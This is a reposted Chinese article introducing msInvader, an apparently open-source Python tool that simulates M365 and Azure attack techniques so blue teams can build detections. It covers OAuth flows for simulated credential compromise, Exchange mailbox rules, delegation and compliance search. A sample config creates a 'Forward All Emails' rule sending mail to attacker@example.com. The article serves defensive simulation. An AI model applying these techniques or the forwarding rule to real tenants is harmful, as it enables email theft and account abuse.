关于msInvadermsInvader是一款针对M365和Azure环境的威胁模拟与研究工具,该工具专为蓝队研究人员打造,旨在模拟 M365 和 Azure 环境中的威胁技术。其目的是生成攻击遥测,帮助团队构建、测试和增强检测分析。摘要:关于msInvadermsInvader是一款针对M365和Azure环境的威胁模拟与研究工具,该工具专为蓝队研究人员打造,旨在模拟 M365 和 Azure 环境中的威胁技术。其目的是生成攻击遥测,帮助团队构建、测试和增强检测分析。
为了促进真实的模拟,msInvader 实现了多种反映不同攻击场景的身份验证机制。它支持两种 OAuth 流来模拟受损用户场景:资源所有者密码流和设备授权流。这些方法允许 msInvader 获取模拟用户凭据受损或中间人 (AiTM) 攻击成功的令牌。此外,msInvader 可以通过支持客户端凭据 OAuth 流来复制涉及受损服务主体的条件。
经过身份验证后,msInvader 能够通过三种不同的方法与 Exchange Online 进行交互:Graph API、Exchange Web 服务 (EWS) 和 Exchange Online PowerShell 模块使用的 REST API。这种支持使 msInvader 能够全面模拟攻击技术,为蓝队提供模拟多种场景的灵活性。
支持的技术技术GraphEWSRESTcreate_ruleXXXenable_email_forwardingXadd_folder_permission
XXadd_mailbox_delegation
Xrun_compliance_search
Xcreate_mailflow
X工具要求
Python 3
工具安装由于该工具基于Python 3开发,因此我们首先需要在本地设备上安装并配置好最新版本的Python 3环境。
接下来,广大研究人员可以直接使用下列命令将该项目源码克隆至本地:
git clone https://github.com/mvelazc0/msInvader.git工具使用自定义配置文件
打开位于 msInvader 目录中的config.yaml文件,然后使用Azure/M365 凭据配置该文件中的authentication部分:
参考样例如下:
mailbox: "user@example.com"access_method: "ews"rule_name: "Forward All Emails"forward_to: "attacker@example.com"最后,使用刚才配置好的配置文件运行msInvader即可:
pythonmsInvader.py-cconfig.yaml工具运行演示视频演示:https://www.youtube.com/watch?v=a6iUrufyXRE许可证协议本项目的开发与发布遵循Apache-2.0开源许可协议。
项目地址msInvader:
在这里,拓宽网安边界来源:FreeBuf
免责声明:本站系转载,并不代表本网赞同其观点和对其真实性负责。如涉及作品内容、版权和其它问题,请在30日内与本站联系,我们将在第一时间删除内容!
